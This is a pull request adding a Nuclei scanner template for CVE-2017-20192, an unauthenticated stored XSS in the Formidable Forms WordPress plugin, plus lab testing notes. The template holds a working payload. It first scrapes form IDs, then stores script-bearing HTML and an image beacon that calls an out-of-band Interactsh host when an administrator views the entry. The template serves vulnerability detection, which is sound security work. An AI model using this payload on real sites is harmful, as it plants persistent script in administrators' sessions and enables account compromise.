### PR TITLE
Add CVE-2017-20192 Formidable Form Builder - Stored XSS

### DIFF
--- a/http/cves/2017/CVE-2017-20192.yaml
+++ b/http/cves/2017/CVE-2017-20192.yaml
@@ -1,0 +1,94 @@
+id: CVE-2017-20192
+
+info:
+  name: Formidable Forms < 2.05.03 - Unauthenticated Stored XSS (Blind/OAST Validation)
+  author: flame
+  severity: high
+  description: |
+    Formidable Forms (WordPress plugin) is vulnerable to an unauthenticated stored XSS in versions before 2.05.03.
+    An attacker can submit a crafted form entry that is stored and later rendered in the Formidable admin entry view.
+    This template uses blind/OAST (Interactsh) confirmation and does NOT require WordPress credentials.
+    A match occurs if/when an administrator views the injected entry in a browser while nuclei is listening for interactions.
+  impact: |
+    An attacker can inject HTML that is stored in form entries and later rendered in the admin interface,
+    leading to stored XSS and potential admin session compromise.
+  remediation: |
+    Update the Formidable plugin to version 2.05.03 or later.
+  reference:
+    - https://klikki.fi/adv/formidable.html
+    - https://cveawg.mitre.org/api/cve/CVE-2017-20192
+  classification:
+    cve-id: CVE-2017-20192
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    max-request: 2
+  tags: cve,cve2017,wordpress,wp-plugin,formidable,xss,oast,blind
+
+variables:
+  token: "{{randstr}}"
+  payload: |
+    PDCVE201720192-{{token}}
+    <img src="__OAST__" style="display:none" />
+    <form id=tinymce><textarea name=DOM></textarea></form>
+    <a class=frm_field_list>panelInit</a>
+    <a id="frm_dyncontent"><b id="xxxdyn_default_valuexxxxx" class="ui-find-overlay wp-editor-wrap">overlay</b></a>
+    <a id=post-visibility-display>vis1</a><a id=hidden-post-visibility>vis2</a><a id=visibility-radio-private>vis3</a>
+    <div id=frm-fid-search-menu><a id=frm_dynamic_values_tab>zzz</a></div>
+    <form id=posts-filter method=post action=admin-ajax.php?action=frm_forms_preview><textarea name=before_html>&lt;svg on[entry_key]load=alert(/{{token}}/) /&gt;</textarea></form>
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: "action=frm_forms_preview"
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'name="form_id" value="'
+          - 'name="form_key" value="'
+          - 'name="item_meta['
+        condition: and
+        internal: true
+    extractors:
+      - type: regex
+        name: form_id
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - 'name="form_id" value="([0-9]+)"'
+      - type: regex
+        name: form_key
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - 'name="form_key" value="([^"]+)"'
+      - type: regex
+        name: field_id
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - 'name="item_meta\[([1-9][0-9]*)\]"'
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: "frm_action=create&form_id={{form_id}}&form_key={{form_key}}&item_key=&frm_verify=&item_meta[{{field_id}}]={{url_encode(replace(payload,'__OAST__', concat('//{{interactsh-url}}/?c=', token)))}}"
+    # Blind/OAST confirmation (requires victim interaction).
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+          - "dns"
+        condition: or
+
+


### PR DESCRIPTION
/claim #14544

Add Nuclei template for **CVE-2017-20192** (Formidable Forms < 2.05.03).

### Nuclei

```bash
nuclei -u http://127.0.0.1:18080 \
  -t http/cves/2017/CVE-2017-20192.yaml \
  -debug -interactions-cooldown-period 300
```

### Important notes / limitation (stored XSS)

This CVE is **stored XSS**. The template is **unauthenticated** and uses **Interactsh** for confirmation:

- The template submits a malicious entry and embeds an `<img src="//{{interactsh-url}}/?c={{token}}">` beacon.
- Nuclei will only report a finding **after** an administrator (or any privileged user) views the injected entry in a real browser **while nuclei is still running**.

Manual trigger in the provided lab (Information sent by email to templates@projectdiscovery.io):
- Login: `http://127.0.0.1:18080/wp-login.php` (admin/admin)
- Entries list: `http://127.0.0.1:18080/wp-admin/admin.php?page=formidable-entries&frm_action=list&form=3`
- Open **View** on the newest entry to trigger the beacon.



